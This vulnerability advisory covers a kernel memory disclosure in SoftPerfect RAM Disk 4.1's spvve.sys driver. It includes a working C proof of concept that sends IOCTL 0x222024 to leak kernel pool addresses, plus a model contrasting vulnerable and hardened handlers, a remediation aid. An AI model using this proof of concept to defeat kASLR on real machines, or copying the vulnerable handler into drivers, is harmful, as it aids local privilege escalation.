ID TALOS-2020-1122
Type talos
Reporter Talos Intelligence
Modified 2020-08-04T00:00:00
Description
Summary
An exploitable information disclosure vulnerability exists in SoftPerfect’s RAM Disk 4.1 spvve.sys driver. A specially crafted I/O request packet (IRP) can cause the disclosure of sensitive information. An attacker can send a malicious IRP to trigger this vulnerability.
Tested Versions
SoftPerfect RAM Disk 4.1
Product URLs
<https://www.softperfect.com/products/ramdisk/>
CVSSv3 Score
3.8 - CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
CWE
CWE-200 - Information Exposure
Details
SoftPerfect RAM Disk is a high-performance RAM disk application that lets the user create a virtual disk backed by the computer's physical memory.
The spvve.sys driver creates a device object, \Device\SoftPerfectVolume, without restricting who may open it, so it is accessible to any user on the system. Any local user can therefore open the device and send it a specially crafted I/O request packet (IRP): the handler for IOCTL 0x222024 returns data that includes kernel pool memory addresses, as the proof of concept below shows.
#include <windows.h>
#include <winternl.h>
#include <stdio.h>
#include <ctype.h>

#pragma comment(lib, "ntdll.lib")

#ifndef NT_SUCCESS
#define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)
#endif

// CreateFile cannot open a native \Device\... path directly, so the device is
// opened with NtOpenFile (the report's OpenDeviceWorker helper is not shown).
static HANDLE OpenDevice(LPCWSTR deviceName)
{
    UNICODE_STRING name;
    OBJECT_ATTRIBUTES oa;
    IO_STATUS_BLOCK iosb;
    HANDLE hDevice = NULL;

    RtlInitUnicodeString(&name, deviceName);
    InitializeObjectAttributes(&oa, &name, OBJ_CASE_INSENSITIVE, NULL, NULL);
    NTSTATUS status = NtOpenFile(&hDevice, GENERIC_READ | GENERIC_WRITE, &oa, &iosb,
                                 FILE_SHARE_READ | FILE_SHARE_WRITE, 0);
    if (!NT_SUCCESS(status)) {
        printf("error: NtOpenFile(%ls) failed, status 0x%08lX\n", deviceName, status);
        return INVALID_HANDLE_VALUE;
    }
    return hDevice;
}

int main()
{
    LPCWSTR deviceName = L"\\Device\\SoftPerfectVolume";
    HANDLE hDevice = OpenDevice(deviceName);
    if (hDevice == INVALID_HANDLE_VALUE) {
        return 1;
    }

    const DWORD inBufferSize = 8;
    const DWORD outBufferSize = 16;
    BYTE inBuffer[inBufferSize] = { 0 };    // request body; its contents do not matter for the leak
    BYTE outBuffer[outBufferSize] = { 0 };  // zeroed, so any non-zero byte came from the driver
    DWORD returned = 0;

    // kernel pool memory address leak
    printf("DeviceIoControl IOCTL : 0x222024\n");
    DeviceIoControl(hDevice, 0x222024, inBuffer, inBufferSize,
                    outBuffer, outBufferSize, &returned, NULL);

    // hex dump of the output buffer: ASCII column first, then the raw bytes
    printf("0000 : ");
    for (DWORD i = 0; i < outBufferSize; i++) {
        putchar(isprint(outBuffer[i]) ? outBuffer[i] : '.');
    }
    for (DWORD i = 0; i < outBufferSize; i++) {
        printf(" %02X", outBuffer[i]);
    }
    printf("\n");

    CloseHandle(hDevice);
    return 0;
}
output:
C:\tmp\ramdisk>RamDiskMemLeak.exe
DeviceIoControl IOCTL : 0x222024
0000 : ....h....2...2.. D0 96 EA 00 68 92 EA 00 00 32 EA 00 00 32 EA 00
C:\tmp\ramdisk>RamDiskMemLeak.exe
DeviceIoControl IOCTL : 0x222024
0000 : h8O...O......0.. 68 38 4F 01 C0 00 4F 01 07 00 00 07 B0 30 00 00
C:\tmp\ramdisk>RamDiskMemLeak.exe
DeviceIoControl IOCTL : 0x222024
0000 : .!.............. A8 21 FD 00 C0 00 FD 00 00 00 00 00 00 00 00 00
A leak of this kind lets an attacker bypass the kASLR mitigation and, when used in conjunction with another vulnerability that needs a known kernel address, opens the possibility of local privilege escalation.
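The following is an added example, not code from the Talos report or from SoftPerfect. It decodes 0x222024 into its CTL_CODE fields (device type 0x22, FILE_DEVICE_UNKNOWN; function 0x809; METHOD_BUFFERED; FILE_ANY_ACCESS, so the I/O manager performs no handle-rights check on the request beyond the open itself) and then models, in portable C, one common way a METHOD_BUFFERED handler leaks pool contents: it reports more bytes in IoStatus.Information than it actually wrote, so the I/O manager copies stale pool data back to user mode. A hardened handler is shown beside it. The report does not give the root cause inside spvve.sys; the two handlers, the irp_model structure and the STALE_POOL pattern are constructed assumptions for illustration only.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Field layout of a Windows I/O control code, as produced by the CTL_CODE macro:
 * bits 31..16 DeviceType, 15..14 RequiredAccess, 13..2 Function, 1..0 TransferType. */
typedef struct {
    uint32_t device_type;   /* 0x22 = FILE_DEVICE_UNKNOWN */
    uint32_t access;        /* 0 = FILE_ANY_ACCESS: no handle-rights check by the I/O manager */
    uint32_t function;
    uint32_t method;        /* 0 = METHOD_BUFFERED: kernel copies SystemBuffer back to the caller */
} ioctl_fields;

ioctl_fields decode_ioctl(uint32_t code)
{
    ioctl_fields f;
    f.device_type = (code >> 16) & 0xFFFF;
    f.access      = (code >> 14) & 0x3;
    f.function    = (code >> 2)  & 0xFFF;
    f.method      = code & 0x3;
    return f;
}

/* Minimal model of METHOD_BUFFERED (assumption: a simplification of the I/O manager, not
 * kernel code): one pool buffer of max(in_len, out_len) bytes receives the caller's input,
 * the driver fills it, and Irp->IoStatus.Information bytes are copied back to the caller. */
typedef struct {
    uint8_t *system_buffer;
    size_t   in_len;
    size_t   out_len;
    size_t   information;   /* stands in for Irp->IoStatus.Information */
} irp_model;

typedef void (*ioctl_handler)(irp_model *irp);

/* Constructed stand-in for what a recycled pool allocation may still hold:
 * here, a fake x64 kernel pointer. Not a value taken from the report. */
static const uint8_t STALE_POOL[16] = {
    0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
    0x00, 0x10, 0x20, 0x30, 0x80, 0xF8, 0xFF, 0xFF   /* 0xFFFFF88030201000 little-endian */
};

/* Vulnerable pattern: writes an 8-byte result but reports the whole output length,
 * so the remaining bytes copied back are whatever the pool block held before. */
void handler_vulnerable(irp_model *irp)
{
    uint64_t result = 0x0102030405060708ULL;   /* constructed placeholder result */
    if (irp->out_len < sizeof result) { irp->information = 0; return; }
    memcpy(irp->system_buffer, &result, sizeof result);
    irp->information = irp->out_len;
}

/* Hardened pattern: reject short buffers, clear the whole buffer, and report
 * exactly the number of bytes the driver actually produced. */
void handler_hardened(irp_model *irp)
{
    uint64_t result = 0x0102030405060708ULL;
    if (irp->out_len < sizeof result) { irp->information = 0; return; }
    memset(irp->system_buffer, 0, irp->out_len);
    memcpy(irp->system_buffer, &result, sizeof result);
    irp->information = sizeof result;
}

/* Pushes one request through the model; returns the number of bytes handed back to `out`. */
size_t run_ioctl(ioctl_handler handler, const uint8_t *in, size_t in_len,
                 uint8_t *out, size_t out_len)
{
    uint8_t pool[64] = { 0 };
    size_t alloc = in_len > out_len ? in_len : out_len;
    if (alloc > sizeof pool) return 0;
    memcpy(pool, STALE_POOL, sizeof STALE_POOL);   /* the allocation is recycled, not zeroed */
    memcpy(pool, in, in_len);
    irp_model irp = { pool, in_len, out_len, 0 };
    handler(&irp);
    size_t n = irp.information < out_len ? irp.information : out_len;
    memcpy(out, pool, n);
    return n;
}

/* Returns 1 if the stale pointer bytes reached the caller's buffer. Uses the same
 * shape as the report's call: 8-byte input, 16-byte output. */
int leaks_stale_pool(ioctl_handler handler)
{
    uint8_t in[8] = { 0 }, out[16] = { 0 };
    size_t n = run_ioctl(handler, in, sizeof in, out, sizeof out);
    return n > 8 && memcmp(out + 8, STALE_POOL + 8, 8) == 0;
}

int main(void)
{
    ioctl_fields f = decode_ioctl(0x222024);
    printf("0x222024: DeviceType=0x%X Access=%u Function=0x%X Method=%u\n",
           f.device_type, f.access, f.function, f.method);
    printf("vulnerable handler leaks stale pool bytes: %d\n", leaks_stale_pool(handler_vulnerable));
    printf("hardened handler leaks stale pool bytes:   %d\n", leaks_stale_pool(handler_hardened));
    return 0;
}
```

Build with any C99 compiler and run. The decode applies to any driver IOCTL, and the pair of handlers is the pattern to look for when auditing a dispatch routine: IoStatus.Information must equal the number of bytes actually written, and the buffer must be cleared before any partial write, otherwise METHOD_BUFFERED copies leftover pool contents straight back to the caller.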
Timeline
2020-07-16 - Vendor Disclosure
2020-07-23 - Vendor Patched
2020-08-04 - Public Release
CVE CVE-2020-13523
NVD CVSSv3.1 3.3 - CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N (Low)
NVD CVSSv2 2.1 - AV:L/AC:L/Au:N/C:P/I:N/A:N (Low)
NVD CWE CWE-862 - Missing Authorization
CPE cpe:2.3:a:softperfect:ram_disk:4.1:*:*:*:*:windows:*:*
Reference <https://www.talosintelligence.com/vulnerability_reports/TALOS-2020-1122>
Reference <https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-13523>